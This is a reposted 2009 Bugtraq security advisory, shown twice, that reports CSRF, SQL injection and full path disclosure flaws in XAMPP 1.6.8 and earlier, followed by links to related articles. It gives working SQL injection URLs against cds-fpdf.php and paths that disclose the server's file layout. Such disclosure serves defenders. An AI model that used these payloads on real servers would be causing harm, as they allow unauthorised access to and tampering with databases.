Multiple vulnerabilities in XAMPP
2010-01-30 09:40
1791 查看
http://www.securityfocus.com/bid/37999/exploit
Hello Bugtraq!
I am continue informing you about multiple vulnerabilities in XAMPP.
-----------------------------
Advisory #7
-----------------------------
CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP
-----------------------------
URL: http://websecurity.com.ua/3285/ -----------------------------
Timeline:
27.06.2009 - found the vulnerabilities.
01.07.2009 - announced at my site.
02.07.2009 - informed developers.
08.08.2009 - disclosed at my site.
-----------------------------
Details:
These are Cross-Site Request Forgery, SQL Injection and Full path disclosure
vulnerabilities.
CSRF:
http://site/xampp/cds-fpdf.php
It's possible to delete or add data in test table (as via CSRF, and as via
Insufficient Authorization vulnerabilities). And also to conduct SQL
Injection via CSRF attacks.
SQL Injection:
http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals
on)
http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1, 1
http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/ *
(mq off)
http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq
off)
Attack is possible during access to admin panel (via Insufficient
Authorization), or via CSRF.
Full path disclosure:
http://site/xampp/external/ps/draw.php http://site/xampp/external/ps/hyperlinks.php http://site/xampp/external/ps/image.php http://site/xampp/external/ps/overprint.php http://site/xampp/external/ps/ps.php?submit=OK http://site/xampp/external/ps/shading.php http://site/xampp/external/ps/spotcolor.php http://site/xampp/external/ps/text.php http://site/xampp/special/ps/draw.php http://site/xampp/special/ps/hyperlinks.php http://site/xampp/special/ps/image.php http://site/xampp/special/ps/overprint.php http://site/xampp/special/ps/ps.php?submit=OK http://site/xampp/special/ps/shading.php http://site/xampp/special/ps/spotcolor.php http://site/xampp/special/ps/text.php
Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
versions (including last version XAMPP 1.7.1).
-----------------------------
Best wishes & regards,
MustLive
Administrator of Websecurity web site http://websecurity.com.ua
Hello Bugtraq!
I am continue informing you about multiple vulnerabilities in XAMPP.
-----------------------------
Advisory #7
-----------------------------
CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP
-----------------------------
URL: http://websecurity.com.ua/3285/ -----------------------------
Timeline:
27.06.2009 - found the vulnerabilities.
01.07.2009 - announced at my site.
02.07.2009 - informed developers.
08.08.2009 - disclosed at my site.
-----------------------------
Details:
These are Cross-Site Request Forgery, SQL Injection and Full path disclosure
vulnerabilities.
CSRF:
http://site/xampp/cds-fpdf.php
It's possible to delete or add data in test table (as via CSRF, and as via
Insufficient Authorization vulnerabilities). And also to conduct SQL
Injection via CSRF attacks.
SQL Injection:
http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals
on)
http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1, 1
http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/ *
(mq off)
http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq
off)
Attack is possible during access to admin panel (via Insufficient
Authorization), or via CSRF.
Full path disclosure:
http://site/xampp/external/ps/draw.php http://site/xampp/external/ps/hyperlinks.php http://site/xampp/external/ps/image.php http://site/xampp/external/ps/overprint.php http://site/xampp/external/ps/ps.php?submit=OK http://site/xampp/external/ps/shading.php http://site/xampp/external/ps/spotcolor.php http://site/xampp/external/ps/text.php http://site/xampp/special/ps/draw.php http://site/xampp/special/ps/hyperlinks.php http://site/xampp/special/ps/image.php http://site/xampp/special/ps/overprint.php http://site/xampp/special/ps/ps.php?submit=OK http://site/xampp/special/ps/shading.php http://site/xampp/special/ps/spotcolor.php http://site/xampp/special/ps/text.php
Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
versions (including last version XAMPP 1.7.1).
-----------------------------
Best wishes & regards,
MustLive
Administrator of Websecurity web site http://websecurity.com.ua
相关文章推荐
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Multiple vulnerabilities in Cacti 0.8.8b and lower
- Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
- [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- [waraxe-2012-SA#084] - Multiple Vulnerabilities in OpenCart 1.5.2.1 漏洞
- Multiple critical vulnerabilities in Apache Struts2
- Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
- BF and IA vulnerabilities in IBM Lotus Domino
- Multiple substitutions specified in non-positional format; did you mean to add the formatted="false"
- How To Create Multiple Folders And Sub-Folders In One Go
- QT multiple types in one declaration错误提示
- Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities
- Programming with Multiple Paradigms in Lua(Object-Oriented Programming)
- Managing Multiple Resources in Hadoop 2 with YARN
- 【转】修复关于apache-xampp的问题:Port 443 in use by “vmware-hostd.exe”!
- 转贴 MySQL Multiple Result Procs in PHP
- MVVM :How to select multiple items in listbox
- Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities
- Previewing and plotting multiple sheets in AutoCAD using .NET